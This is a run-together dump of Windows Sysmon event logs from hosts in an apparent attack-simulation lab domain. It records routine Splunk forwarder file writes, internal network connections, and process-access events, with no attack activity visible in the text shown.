07:59:13.829{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C402B64BF16455DF5670B17C962C0E,SHA256=835360F021F49110D6831E6C1F130221BD1DCE5C7F5840AE057281A81F9EC8F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808797Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:13.378{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C717DAF07B6535F196C78B0B8AA73A9,SHA256=557B292EEDC1174AC8A7CA2B859AF970336199DE26418A22A48D6A70661CAE8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:14.829{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4559D7C6EF3C09129C98BF13374568A0,SHA256=AB535A3210CB671E23599F52A8C1C43D624F120E57B6866860E277DBF7AA8DAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808799Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:14.421{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3911F6311FDC4DD39A100EE538E6322,SHA256=564C404FC372EAB8CE2F4B82714AF03795F841DAF9CAAD672257E5AA5953C631,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.792{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51130-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x8000000000000000808798Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:12.260{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57354-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:15.846{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D488A637D26726200D71ACE47AA5C907,SHA256=6D87BDC2B7D1F2EDB7CF970540FAD7EC992122378F2BC2DF8A36B6484B868413,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808800Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:15.436{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA51E5A64D4B4CA7D436A9C199D6E8A7,SHA256=4D13065D147DC59EE07D97F1958791AD65C133ED33426B61A883C21318893A84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:15.481{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60940E08F13BD691933FA56FB3A83246,SHA256=7A7EA7800CA9ABAAC12222844AE0AB28DB1372066375FED2BD18ED3B11F0EB27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:16.865{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84B78D98E2F80ED90AAA97AA9A24B888,SHA256=B4817FF956612B5FC323005FA278668EB4228B5D13045A47A13E820DB3C270C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808801Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:16.515{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F6A5F616D7DC219CD3850F8A0CB498A,SHA256=B13A9C4AA4A63042BACB105D1EAD55A8C68ED82AEB8D8F5D31C32926578A9D9C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:08.002{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51131-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001051848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:08.002{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51131-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001051851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:17.880{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58004C551856F6B37612231F2282725C,SHA256=85B5E5479480AA7891950DE5B9AA5CC6278FDEE39B8E3DF5D5015AA943981A16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808802Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:17.530{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0120EEDB422260F711A556BAB853A08,SHA256=7E5F7CCDF79878A5D4A50909C80B17EF41D1E5A3BCFA89DADA6B79253F4B4067,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:18.911{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=609FF3AB5FF3C6181E831823AEABDB1D,SHA256=9A3B30E8CBECFF19808BEE772DEE5F7879248300F709D2EEE9DEA3C7B0F2D098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808803Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:18.577{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85430A8A177F50B6EE45710D7B290E79,SHA256=77A3B7E5091D5ECFB76BAA78EE86D513A2939A7E3C479C1EB8B2DBDFB3513E28,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:10.647{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51132-false10.0.1.12-8000- 23542300x80000000000000001051852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:18.380{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:19.926{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6265BCD9FA12C7B29ACC8287F2925F2A,SHA256=E264D05F46CD3B7EFCF4B5C5E4710E4BA654DB8279E01D9377067D83402FF0D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808804Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:19.624{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9D455A5811AB8780974073896D344EB,SHA256=7B09215A0BDA16D033BC3059E5D3D980B85A5823636587C5951C3D90033039E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:19.043{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001051856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:19.042{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:19.042{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:20.944{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CE84184DCC02A8C7007D58DB5D50263,SHA256=08FD9F122B5CB8B561432B9F972FC9A8E1483090D3C8A38ED937984019ACCC4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808807Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:20.671{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 
Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808806Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:20.655{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37138AB299294F2D6C45AE5020E8C92E,SHA256=3D4A08B0CDA669AF7E5F774FFDF7C71484E24222F8E767BDA90B4A65A2A51945,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808805Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:18.225{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57355-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:21.962{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A6F3705D6B6BB4E48C638CE991AFACD,SHA256=25FBDEA56E49CEC1EB4D5D1F57CC866996804F74B6857C8CA1C058FA2453A206,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808808Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:21.671{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=784950E6C432A2EF7D4ED8C062AAB0AB,SHA256=D324CDF74908426D937308882CA5B1800A1C10E328C7588B124453B5A7A9C76F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:22.978{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B7418366D0C902018DC0672B13E79A8,SHA256=A3546A163AE734952524B7C60DBEA752CDBEF0732ADCFBFAEBB264F38A6ED2BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808810Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:22.702{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDA73DE8DBF7B79BEA6AB7D888A9CE45,SHA256=BB1B1E75EE3EE77713803123D41EA6D0088557A3B36880D80E303FF1A185CBD5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808809Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:20.803{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57356-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000808811Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:23.733{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A029118E2F3E6DDF223BF17F40F87013,SHA256=3C5E1AAD1EB37A18BF0DC8FC793E25A9E1C3A2A4223E75CD013380CECE6DC177,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:23.009{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BD4BE720981E99E7BB197975454D34D,SHA256=1D25E1B996F0F6254F4423567FEDFDE914E7C1E57561EBDC2356DEC9F3F36194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:23.009{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB528EBE9B9A4706278E7049A6A2E11F,SHA256=1B6C1A828E0F5F5A816DAE1D785B3E9BF918257FC3C0DD7FF2DE757533F9ECCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808826Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.764{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8458EACED5251D52C39950DC92EA10C,SHA256=C9E5C9AB6243CB2FFEB0C10D0BD920BEAAD4E8F4D641609CBC9FD6BBE58B3D56,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:16.660{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51133-false10.0.1.12-8000- 23542300x80000000000000001051864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:24.008{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35D418982C0D230A18402282CD50A988,SHA256=D172228F8CB213F0A73AED972ACE48382DAF789EA228C8EB51C58A9ECB6F6801,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808825Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.530{0C1E0330-F65C-60EB-A479-00000000D001}1843640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808824Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F65C-60EB-A479-00000000D001}184C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808823Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808822Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808821Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808820Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808819Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808818Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
